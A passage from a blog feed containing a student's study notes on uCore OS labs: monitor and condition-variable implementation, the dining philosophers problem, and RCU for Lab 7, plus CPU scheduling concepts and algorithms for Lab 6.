class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span> <span class="title class_">monitor</span> <span class="type">monitor_t</span>;</span><br><span 
class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span> <span class="title class_">condvar</span>&#123;</span><br><span class="line">    <span class="type">semaphore_t</span> sem;        <span class="comment">// 条件变量所对应的信号量</span></span><br><span class="line">    <span class="type">int</span> count;              <span class="comment">// 等待当前条件变量的等待进程总数</span></span><br><span class="line">    <span class="type">monitor_t</span> * owner;      <span class="comment">// 当前条件变量的父管程</span></span><br><span class="line">&#125; <span class="type">condvar_t</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span> <span class="title class_">monitor</span>&#123;</span><br><span class="line">    <span class="type">semaphore_t</span> mutex;      <span class="comment">// 管程锁，每次只能有一个进程执行管程代码。该值初始化为1</span></span><br><span class="line">    <span class="type">semaphore_t</span> next;       <span class="comment">// the next semaphore is used to down the signaling proc itself, and the other OR wakeuped waiting proc should wake up the sleeped signaling proc.</span></span><br><span class="line">    <span class="type">int</span> next_count;         <span class="comment">// the number of of sleeped signaling proc</span></span><br><span class="line">    <span class="type">condvar_t</span> *cv;          <span class="comment">// 当前管程中存放所有条件变量的数组</span></span><br><span class="line">&#125; <span class="type">monitor_t</span>;</span><br></pre></td></tr></table></figure><blockquote><p>注意：<code>monitor</code>结构中<code>next</code>信号量的功能请在下文结合<code>cond_signal</code>说明来理解。</p></blockquote></li><li><p>初始化管程时，函数<code>monitor_init</code>会初始化传入管程的相关成员变量，并为该管程设置多个条件变量并初始化。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span 
class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Initialize monitor.</span></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">monitor_init</span> <span class="params">(<span class="type">monitor_t</span> * mtp, <span class="type">size_t</span> num_cv)</span> </span>&#123;</span><br><span class="line">    <span class="type">int</span> i;</span><br><span class="line">    <span class="built_in">assert</span>(num_cv&gt;<span class="number">0</span>);</span><br><span class="line">    mtp-&gt;next_count = <span class="number">0</span>;</span><br><span class="line">    mtp-&gt;cv = <span class="literal">NULL</span>;</span><br><span class="line">    <span class="comment">// 初始化管程锁为1</span></span><br><span class="line">    <span class="built_in">sem_init</span>(&amp;(mtp-&gt;mutex), <span class="number">1</span>); <span class="comment">//unlocked</span></span><br><span class="line">    <span class="built_in">sem_init</span>(&amp;(mtp-&gt;next), <span class="number">0</span>);<span class="comment">// 注意这里的0</span></span><br><span class="line">    <span class="comment">// 分配当前管程内的条件变量</span></span><br><span class="line">    mtp-&gt;cv =(<span class="type">condvar_t</span> *) <span class="built_in">kmalloc</span>(<span class="built_in">sizeof</span>(<span class="type">condvar_t</span>)*num_cv);</span><br><span class="line">    <span class="built_in">assert</span>(mtp-&gt;cv!=<span 
class="literal">NULL</span>);</span><br><span class="line">    <span class="comment">// Initialize each field of the condition variables in this monitor</span></span><br><span class="line">    <span class="keyword">for</span>(i=<span class="number">0</span>; i&lt;num_cv; i++)&#123;</span><br><span class="line">        mtp-&gt;cv[i].count=<span class="number">0</span>;</span><br><span class="line">        <span class="built_in">sem_init</span>(&amp;(mtp-&gt;cv[i].sem),<span class="number">0</span>);</span><br><span class="line">        mtp-&gt;cv[i].owner=mtp;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>When a thread is about to leave the critical section and release (signal) the corresponding condition variable, it calls <code>cond_signal</code>. This is also one of the functions to implement in this lab.</p><ul><li><p>If <strong>no thread</strong> is waiting on the condition variable being released, do nothing.</p></li><li><p>Otherwise, perform a V operation on the semaphore embedded in the condition variable. Note: this step may wake up a waiting thread.</p></li><li><p><strong>The key step!</strong> The function then executes <code>down(&amp;(cvp-&gt;owner-&gt;next))</code>. Because <code>monitor::next</code> is initialized to <strong>0</strong>, whenever execution reaches this line, <strong>the thread currently running <code>cond_signal</code> is always suspended</strong>. This is exactly what the <code>next</code> semaphore in the monitor is for.</p><blockquote><p>Why is this step needed? To <strong>guarantee mutually exclusive access to the monitor code</strong>.</p><p>A simple example: thread 1 is suspended waiting on condition variable a. Some time later, thread 2 releases condition variable a, so thread 1 is woken up and waits to be scheduled. Note! <strong>At this point there are two active threads in the monitor code</strong> (active here means running or ready), which <strong>violates the monitor's mutual exclusion</strong>. Thread 2 should therefore <strong>suspend immediately</strong> after releasing condition variable a to keep the monitor code mutually exclusive, and the <code>next</code> semaphore is what lets thread 2 suspend immediately.</p></blockquote></li></ul><p>The implementation of this function is as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span 
class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Unlock one of threads waiting on the condition variable.</span></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">cond_signal</span> <span class="params">(<span class="type">condvar_t</span> *cvp)</span> </span>&#123;</span><br><span class="line">   <span class="comment">//LAB7 EXERCISE1: YOUR CODE</span></span><br><span class="line">   <span class="built_in">cprintf</span>(<span class="string">&quot;cond_signal begin: cvp %x, cvp-&gt;count %d, cvp-&gt;owner-&gt;next_count %d\n&quot;</span>, cvp, cvp-&gt;count, cvp-&gt;owner-&gt;next_count);  </span><br><span class="line">  <span class="comment">/*</span></span><br><span class="line"><span class="comment">   *      cond_signal(cv) &#123;</span></span><br><span class="line"><span class="comment">   *          if(cv.count&gt;0) &#123;</span></span><br><span class="line"><span class="comment">   *             mt.next_count ++;</span></span><br><span class="line"><span class="comment">   *             signal(cv.sem);</span></span><br><span class="line"><span class="comment">   *             wait(mt.next);</span></span><br><span class="line"><span class="comment">   *             mt.next_count--;</span></span><br><span class="line"><span class="comment"> *          &#125;</span></span><br><span class="line"><span class="comment">   *       &#125;</span></span><br><span class="line"><span class="comment">   */</span></span><br><span class="line">    <span class="keyword">if</span>(cvp-&gt;count&gt;<span class="number">0</span>) &#123;</span><br><span class="line">        cvp-&gt;owner-&gt;next_count ++;</span><br><span class="line">        <span 
class="built_in">up</span>(&amp;(cvp-&gt;sem));</span><br><span class="line">        <span class="built_in">down</span>(&amp;(cvp-&gt;owner-&gt;next));</span><br><span class="line">        cvp-&gt;owner-&gt;next_count --;</span><br><span class="line">   &#125;</span><br><span class="line">   <span class="built_in">cprintf</span>(<span class="string">&quot;cond_signal end: cvp %x, cvp-&gt;count %d, cvp-&gt;owner-&gt;next_count %d\n&quot;</span>, cvp, cvp-&gt;count, cvp-&gt;owner-&gt;next_count);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>When a thread needs to wait on a condition variable, it calls <code>cond_wait</code>. This is one of the functions to implement in this lab.</p><ul><li><p>When a thread is <strong>about to</strong> <strong>suspend itself</strong> to wait on a condition variable, the condition variable's <code>count</code> field should first be incremented by 1.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cvp-&gt;count++;</span><br></pre></td></tr></table></figure></li><li><p>The current thread should then release <strong>the mutex of the monitor that owns the condition variable it is waiting on</strong>, so that other threads can run the monitor code.</p><p>However, if some thread is already inside the monitor but suspended because it called <code>cond_signal</code>, that thread is resumed first.</p><blockquote><p>For details on "a thread suspended because it called <code>cond_signal</code>", see the description of <code>cond_signal</code> above.</p></blockquote><p>If the code takes the <code>up(&amp;(cvp-&gt;owner-&gt;next))</code> branch, note that <strong>the mutex is not released</strong>. The current thread is about to be suspended and a thread that was already inside the monitor is woken up, so the monitor still contains exactly one active thread and no new thread needs to be let in.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(cvp-&gt;owner-&gt;next_count &gt; <span class="number">0</span>)</span><br><span class="line">    <span class="built_in">up</span>(&amp;(cvp-&gt;owner-&gt;next));</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">    <span 
class="built_in">up</span>(&amp;(cvp-&gt;owner-&gt;mutex));</span><br></pre></td></tr></table></figure></li><li><p>After releasing the monitor, try to acquire the condition variable. If it cannot be acquired, the current thread is suspended inside <code>down</code>.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">down</span>(&amp;(cvp-&gt;sem));</span><br></pre></td></tr></table></figure></li><li><p>Once the current thread has acquired the condition variable, the number of threads waiting on it is decremented by one.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cvp-&gt;count--;</span><br></pre></td></tr></table></figure></li></ul><blockquote><p>Is that all? Think about why a thread that has successfully acquired the condition variable <strong>does not re-acquire the monitor's mutex</strong>.</p><p>Here is a simple walk-through: thread 1 calls wait, is suspended, and releases the monitor's mutex. Thread 2 then acquires the mutex, enters the monitor, calls signal to wake thread 1, and suspends itself. From start to finish the monitor contains only one active thread (first thread 1 runs while thread 2 has not entered; then thread 1 is suspended and thread 2 enters; then thread 1 is woken and thread 2 is suspended). The mutex was already acquired by thread 2 before thread 1 was woken, so <strong>no new thread can enter the monitor</strong>, and the woken thread 1 does not need to acquire the mutex again. Because the monitor lock is held (<strong>no matter which thread acquired it</strong>) and only one thread is active in the monitor, we can <strong>roughly treat the monitor lock as held by the current thread</strong>.</p></blockquote><p>The final code is as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td 
class="code"><pre><span class="line"><span class="comment">// Suspend calling thread on a condition variable waiting for condition Atomically unlocks</span></span><br><span class="line"><span class="comment">// mutex and suspends calling thread on conditional variable after waking up locks mutex. Notice: mp is mutex semaphore for monitor&#x27;s procedures</span></span><br><span class="line"><span class="function"><span class="type">void</span></span></span><br><span class="line"><span class="function"><span class="title">cond_wait</span> <span class="params">(<span class="type">condvar_t</span> *cvp)</span> </span>&#123;</span><br><span class="line">    <span class="comment">//LAB7 EXERCISE1: YOUR CODE</span></span><br><span class="line">    <span class="built_in">cprintf</span>(<span class="string">&quot;cond_wait begin:  cvp %x, cvp-&gt;count %d, cvp-&gt;owner-&gt;next_count %d\n&quot;</span>, cvp, cvp-&gt;count, cvp-&gt;owner-&gt;next_count);</span><br><span class="line">   <span class="comment">/*</span></span><br><span class="line"><span class="comment">    *         cv.count ++;</span></span><br><span class="line"><span class="comment">    *         if(mt.next_count&gt;0)</span></span><br><span class="line"><span class="comment">    *            signal(mt.next)</span></span><br><span class="line"><span class="comment">    *         else</span></span><br><span class="line"><span class="comment">    *            signal(mt.mutex);</span></span><br><span class="line"><span class="comment">    *         wait(cv.sem);</span></span><br><span class="line"><span class="comment">    *         cv.count --;</span></span><br><span class="line"><span class="comment">    */</span></span><br><span class="line">    cvp-&gt;count++;</span><br><span class="line">    <span class="keyword">if</span>(cvp-&gt;owner-&gt;next_count &gt; <span class="number">0</span>)</span><br><span class="line">        <span class="built_in">up</span>(&amp;(cvp-&gt;owner-&gt;next));</span><br><span 
class="line">    <span class="keyword">else</span></span><br><span class="line">        <span class="built_in">up</span>(&amp;(cvp-&gt;owner-&gt;mutex));</span><br><span class="line">    <span class="built_in">down</span>(&amp;(cvp-&gt;sem));</span><br><span class="line">    cvp-&gt;count--;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">cprintf</span>(<span class="string">&quot;cond_wait end:  cvp %x, cvp-&gt;count %d, cvp-&gt;owner-&gt;next_count %d\n&quot;</span>, cvp, cvp-&gt;count, cvp-&gt;owner-&gt;next_count);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>管程中函数的入口出口设计</p><ul><li><p>为了让整个管程正常运行，还需在管程中的每个函数的入口和出口增加相关操作，即：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">monitorFunc</span><span class="params">()</span> </span>&#123;</span><br><span class="line">     <span class="built_in">down</span>(&amp;(mtp-&gt;mutex));</span><br><span class="line"><span class="comment">//--------into routine in monitor--------------</span></span><br><span class="line">      <span class="comment">// ...</span></span><br><span class="line"><span class="comment">//--------leave routine in monitor--------------</span></span><br><span class="line">      <span class="keyword">if</span>(mtp-&gt;next_count&gt;<span class="number">0</span>)</span><br><span class="line">         <span class="built_in">up</span>(&amp;(mtp-&gt;next));</span><br><span class="line">      <span class="keyword">else</span></span><br><span class="line">         <span 
class="built_in">up</span>(&amp;(mtp-&gt;mutex));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>This has two benefits:</p><ul><li>Only one process at a time executes a function in the monitor.</li><li>A process put to sleep by calling <code>cond_signal</code> is never left without anyone to wake it.</li></ul></li><li><p>A short note on the second benefit, <strong>"a process put to sleep by calling <code>cond_signal</code> is never left without anyone to wake it"</strong>:</p><ul><li>Calls to <code>wait</code> and <code>signal</code> in the monitor are ordered in time. For example, after thread 1 calls <code>signal</code> to wake thread 2 and suspends itself, thread 2 cannot, at the moment it resumes, wake thread 1, which is still suspended inside <code>signal</code>.</li><li>In other words, <strong>whenever some thread has executed <code>signal</code> inside the monitor, at least one thread is suspended inside the monitor</strong>.</li><li>The suspended thread 1 can therefore only be woken outside the critical section, and the code implements exactly this step.</li></ul></li></ul></li></ul><blockquote><ol start="2"><li>Implement a solution to the dining philosophers problem with the monitor mechanism (based on condition variables).</li></ol></blockquote><ul><li><p>This exercise involves two functions, <code>phi_take_forks_condvar</code> and <code>phi_put_forks_condvar</code>. The overall logic matches the semaphore-based solution to the dining philosophers problem.</p></li><li><p>First, the philosopher tries to pick up the forks and waits for them if they cannot be obtained.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">phi_take_forks_condvar</span><span class="params">(<span class="type">int</span> i)</span> </span>&#123;</span><br><span class="line">     <span class="built_in">down</span>(&amp;(mtp-&gt;mutex));</span><br><span class="line"><span class="comment">//--------into routine in monitor--------------</span></span><br><span class="line">     <span 
class="comment">// LAB7 EXERCISE1: YOUR CODE</span></span><br><span class="line">     <span class="comment">// I am hungry</span></span><br><span class="line">     state_condvar[i]=HUNGRY; <span class="comment">/* 记录下哲学家i饥饿的事实 */</span></span><br><span class="line">     <span class="comment">// try to get fork</span></span><br><span class="line">     <span class="built_in">phi_test_condvar</span>(i);</span><br><span class="line">     <span class="keyword">if</span> (state_condvar[i] != EATING) &#123;</span><br><span class="line">          <span class="built_in">cprintf</span>(<span class="string">&quot;phi_take_forks_condvar: %d didn&#x27;t get fork and will wait\n&quot;</span>,i);</span><br><span class="line">          <span class="built_in">cond_wait</span>(&amp;mtp-&gt;cv[i]);</span><br><span class="line">      &#125;</span><br><span class="line"><span class="comment">//--------leave routine in monitor--------------</span></span><br><span class="line">      <span class="keyword">if</span>(mtp-&gt;next_count&gt;<span class="number">0</span>)</span><br><span class="line">         <span class="built_in">up</span>(&amp;(mtp-&gt;next));</span><br><span class="line">      <span class="keyword">else</span></span><br><span class="line">         <span class="built_in">up</span>(&amp;(mtp-&gt;mutex));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>之后，当哲学家放下刀叉时，如果左右两边的哲学家都满足条件可以进餐，则设置对应的条件变量。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span 
class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">phi_put_forks_condvar</span><span class="params">(<span class="type">int</span> i)</span> </span>&#123;</span><br><span class="line">     <span class="built_in">down</span>(&amp;(mtp-&gt;mutex));</span><br><span class="line"><span class="comment">//--------into routine in monitor--------------</span></span><br><span class="line">     <span class="comment">// LAB7 EXERCISE1: YOUR CODE</span></span><br><span class="line">     <span class="comment">// I ate over</span></span><br><span class="line">     state_condvar[i]=THINKING; <span class="comment">/* 哲学家进餐结束 */</span></span><br><span class="line">     <span class="comment">// test left and right neighbors</span></span><br><span class="line">     <span class="built_in">phi_test_condvar</span>(LEFT); <span class="comment">/* 看一下左邻居现在是否能进餐 */</span></span><br><span class="line">     <span class="built_in">phi_test_condvar</span>(RIGHT); <span class="comment">/* 看一下右邻居现在是否能进餐 */</span></span><br><span class="line"><span class="comment">//--------leave routine in monitor--------------</span></span><br><span class="line">     <span class="keyword">if</span>(mtp-&gt;next_count&gt;<span class="number">0</span>)</span><br><span class="line">        <span class="built_in">up</span>(&amp;(mtp-&gt;next));</span><br><span class="line">     <span class="keyword">else</span></span><br><span class="line">        <span class="built_in">up</span>(&amp;(mtp-&gt;mutex));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>以下是哲学家尝试进餐的代码</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span 
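class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">phi_test_condvar</span> <span class="params">(<span class="type">int</span> i)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">if</span>(state_condvar[i]==HUNGRY&amp;&amp;state_condvar[LEFT]!=EATING</span><br><span class="line">            &amp;&amp;state_condvar[RIGHT]!=EATING) &#123;</span><br><span class="line">        <span class="built_in">cprintf</span>(<span class="string">&quot;phi_test_condvar: state_condvar[%d] will eating\n&quot;</span>,i);</span><br><span class="line">        state_condvar[i] = EATING ;</span><br><span class="line">        <span class="built_in">cprintf</span>(<span class="string">&quot;phi_test_condvar: signal self_cv[%d] \n&quot;</span>,i);</span><br><span class="line">        <span class="built_in">cond_signal</span>(&amp;mtp-&gt;cv[i]) ;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul><h3 id="扩展练习">Extension Exercises</h3><h4 id="Challenge-1">Challenge 1</h4><blockquote><p>Implement a simplified deadlock and re-entrancy detection mechanism in ucore.</p></blockquote><blockquote><p>Implement a detection mechanism in ucore that, while multiple processes/threads run a synchronization and mutual-exclusion workload, dynamically determines whether the necessary conditions for deadlock have arisen and whether multiple processes have entered the critical section at once. If so, put the system into the monitor state and print your detection information.</p></blockquote><p>For background on deadlock, see the <a href="#7-%E6%AD%BB%E9%94%81">Deadlock</a> section above.</p><blockquote><p>The implementation is postponed for now.</p></blockquote><h4 id="Challenge-2">Challenge 2</h4><blockquote><p>Implement Linux's RCU synchronization mechanism in ucore.</p></blockquote><p>RCU (Read-Copy Update) fits the readers-writers model, and it is best suited to workloads with <strong>many readers and few writers</strong>, because it behaves as follows:</p><ul><li><p><strong>A read lock can be taken at any time, and some designs need no lock at all</strong>. Reads of the critical section are always satisfied immediately and never block, so readers pay almost no synchronization cost.</p></li><li><p>Only one writer can hold the write lock at any moment, so <strong>writers must exclude one another</strong>. A write consists of copy, modify, and deletion of the original value once the grace period expires. The writer first makes a <strong>copy</strong> of the data and modifies the copy, then repoints the pointer from the original data to the new, modified data, and finally uses a callback mechanism to release the original data at an appropriate time. That time is when every CPU referencing the original data has finished operating on it.</p><blockquote><p>RCU protects pointers, and this point is especially important. A pointer assignment is a single instruction, that is, an atomic operation. Changing where the pointer points needs no extra synchronization; only cache effects have to be considered.</p></blockquote></li><li><p>Suppose the critical section originally holds m1. If a thread takes the write lock and changes it to m2, then a thread that takes the read lock <strong>after</strong> the write sees m2, and a read <strong>before</strong> the write sees m1. Atomic operations guarantee this.</p></li><li><p>RCU reads are always satisfied immediately, but writes consume comparatively more system resources: the modified data structure has to be copied, release of the old structure has to be deferred, and the original resource is fully removed only after the grace period.</p><blockquote><p>After a thread deletes a node, the node is not destroyed right away. Destruction waits until all reading threads have finished reading, because those threads may have read the element being deleted.</p><p>The interval between deleting the node and destroying it is called the <strong>grace period</strong>.</p></blockquote></li></ul><blockquote><p>The implementation is postponed for now QwQ</p></blockquote>]]></content>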
    
    
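    <summary type="html">&lt;h2 id=&quot;简介&quot;&gt;Introduction&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;These are the notes I wrote while working through &lt;code&gt;uCore&lt;/code&gt; Lab 7.&lt;/li&gt;
&lt;li&gt;They cover the implementation of semaphores, monitors, deadlock, and inter-process communication.&lt;/li&gt;
&lt;/ul&gt;</summary>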
    
    
    
    <category term="天问之路" scheme="https://kiprey.github.io/categories/%E5%A4%A9%E9%97%AE%E4%B9%8B%E8%B7%AF/"/>
    
    
    <category term="uCore" scheme="https://kiprey.github.io/tags/uCore/"/>
    
    <category term="OS" scheme="https://kiprey.github.io/tags/OS/"/>
    
  </entry>
  
  <entry>
    <title>uCore Labs - Lab6</title>
    <link href="https://kiprey.github.io/2020/09/uCore-6/"/>
    <id>https://kiprey.github.io/2020/09/uCore-6/</id>
    <published>2020-09-18T09:35:38.000Z</published>
    <updated>2025-11-24T03:59:40.153Z</updated>
    
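    <content type="html"><![CDATA[<h2 id="简介">Introduction</h2><ul><li>These are the notes I wrote while working through <code>uCore</code> Lab 6.</li><li>They cover the implementation of processor scheduling.</li></ul><span id="more"></span><h2 id="知识点">Key Concepts</h2><h3 id="1-CPU资源的时分复用">1. Time-Division Multiplexing of the CPU</h3><ul><li>Process switch: the current holder of the CPU changes<ul><li>Save the current process's execution context (CPU state) in its PCB</li><li>Restore the next process's execution context</li></ul></li><li>Processor scheduling<ul><li><strong>Pick</strong> from the ready queue the next process to run on the CPU.</li><li><strong>Pick</strong>, from the available CPUs, the CPU that a ready process will use.</li></ul></li><li>Scheduler: the kernel function that picks a ready process<ul><li>Scheduling policy: the principle by which a process/thread is picked</li><li>Scheduling timing: when scheduling takes place<ul><li>Conditions under which the kernel runs the scheduler<ul><li>A process moves from the running state to the waiting state</li><li>A process terminates</li></ul></li><li>Non-preemptive systems: when the current process voluntarily gives up the CPU</li><li>Preemptive systems<ul><li>When an interrupt service routine finishes handling an interrupt request</li><li>When the current process is preempted<ul><li>The process's time slice runs out</li><li>A process moves from the waiting state to the ready state</li></ul></li></ul></li></ul></li></ul></li></ul><h3 id="2-调度准则">2. Scheduling Criteria</h3><ul><li><p>Criteria for comparing scheduling algorithms</p><ul><li>CPU utilization: the <strong>percentage of time</strong> the CPU is busy</li><li>Throughput: the <strong>number of processes</strong> completed per unit of time</li><li>Turnaround time: the <strong>total time</strong> from a process's initialization to its completion, including waiting</li><li>Waiting time: the <strong>total time</strong> a process spends in the ready queue</li><li>Response time: the <strong>total time</strong> from submitting a request to producing a response</li></ul></li><li><p>Response-time goals of a scheduling policy</p><ul><li><strong>Reduce response time</strong>: handle user input promptly and return output to the user as soon as possible</li><li><strong>Reduce fluctuation in the average response time</strong>: in interactive systems, predictability matters more than a low average with high variance.</li></ul><blockquote><p>Low-latency scheduling improves the user's interactive experience.</p><p>Response time is the operating system's computational latency.</p></blockquote></li><li><p>Throughput goals of a scheduling policy</p><ul><li><strong>Increase throughput</strong><ul><li>Reduce overhead (for example, context-switch overhead)</li><li>Use system resources efficiently (for example, keep the CPU and I/O devices working in parallel)</li></ul></li><li><strong>Reduce each process's waiting time</strong></li><li>Ensure that <strong>throughput is not affected by user interaction</strong></li></ul><blockquote><p>Throughput is the operating system's computational bandwidth.</p></blockquote></li><li><p>Fairness goals of scheduling</p><ul><li>Ensure every process <strong>receives the same amount of CPU time</strong></li><li>Ensure every process has the same <strong>waiting time</strong></li><li>Fairness usually increases the <strong>average response time</strong></li></ul></li></ul><h3 id="3-调度算法">3. Scheduling Algorithms</h3><h4 id="a-先来先服务算法（First-Come-First-Served-FCFS）">a. 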
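First Come First Served (FCFS)</h4><blockquote><p>Processes are ordered by the time at which they entered the ready state.</p></blockquote><ul><li>Advantage: simple</li><li>Disadvantages:<ul><li><p>The average waiting time fluctuates widely (a short process may be queued behind a long one).</p></li><li><p>I/O and CPU resources may be used inefficiently.</p><blockquote><p>While a CPU-bound process leaves the I/O devices idle, I/O-bound processes are left waiting as well. (The CPU and I/O devices could otherwise work in parallel.)</p></blockquote></li></ul></li></ul><h4 id="b-短进程优先算法（SPN）">b. Shortest Process Next (SPN)</h4><blockquote><p>Select the process in the ready queue with the <strong>shortest</strong> execution time to take the CPU and run. The ready queue is ordered by expected execution time.</p></blockquote><ul><li>Advantage: SPN gives the <strong>optimal</strong> average turnaround time.</li><li>Disadvantages:<ul><li><p>It can cause <strong>starvation</strong>. For example, a continuous stream of short processes keeps long processes from ever getting the CPU.</p></li><li><p><strong>It needs an estimate of the length of the next CPU burst.</strong></p><blockquote><p>One approach is to use <strong>past</strong> execution times to predict <strong>future</strong> execution times.</p></blockquote></li></ul></li></ul><blockquote><p>Shortest Remaining Time (SRT): the preemptive variant of SPN</p></blockquote><h4 id="c-最高响应比优先算法（HRRN）">c. Highest Response Ratio Next (HRRN)</h4><blockquote><p>Select the process in the ready queue with the highest response ratio R,</p><p>where $R=(w+s)/s$, s is the execution time, and w is the waiting time.</p></blockquote><ul><li>An improvement on shortest process next</li><li>Non-preemptive</li><li>Takes each process's waiting time into account</li><li>Prevents indefinite postponement</li></ul><h4 id="d-时间片轮转算法（RR，Round-Robin）">d. Round Robin (RR)</h4><ul><li>Time slice: the basic unit of time in which the processor is allocated</li><li>Idea:<ul><li>When a time slice ends, switch to the next ready process in FCFS order.</li><li>With n ready processes, each process runs for one time slice and then waits n-1 time slices before running again.</li></ul></li><li>Choosing the time slice length<ul><li>If the time slice is too long, <strong>waiting times become too long</strong>, and in the extreme case the algorithm degenerates into FCFS.</li><li>If the time slice is too short, <strong>the system responds quickly</strong>, but the large number of context switches hurts throughput.</li><li>Choose a time slice length that keeps context-switch overhead at around 1%.</li></ul></li></ul><h4 id="e-多级队列调度算法（MQ）">e. Multilevel Queue Scheduling (MQ)</h4><ul><li>The ready queue is divided into several independent sub-queues, each with its own scheduling policy.</li><li>Scheduling between queues<ul><li><p>Fixed priority. For example, serve foreground work first and background work afterwards. This can cause starvation.</p></li><li><p>Time slicing. Each queue receives a fixed share of total CPU time in which to schedule its processes.</p><blockquote><p>For example, 80% of CPU time for the foreground and 20% for the background.</p></blockquote></li></ul></li></ul><h4 id="f-多级反馈队列算法（MLFQ）">f. Multilevel Feedback Queue (MLFQ)</h4><ul><li><p>A multilevel queue algorithm in which processes can move between queues.</p><blockquote><p>The time slice grows as the priority level number increases, so lower-priority queues get longer slices.</p><p>For example, a process that does not finish within its current time slice drops to the next priority level.</p></blockquote></li><li><p>Characteristics: the priority of CPU-bound processes drops quickly, while I/O-bound processes stay at high priority.</p></li></ul><h4 id="g-公平共享调度（FSS-Fair-Share-Scheduling）">g. 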
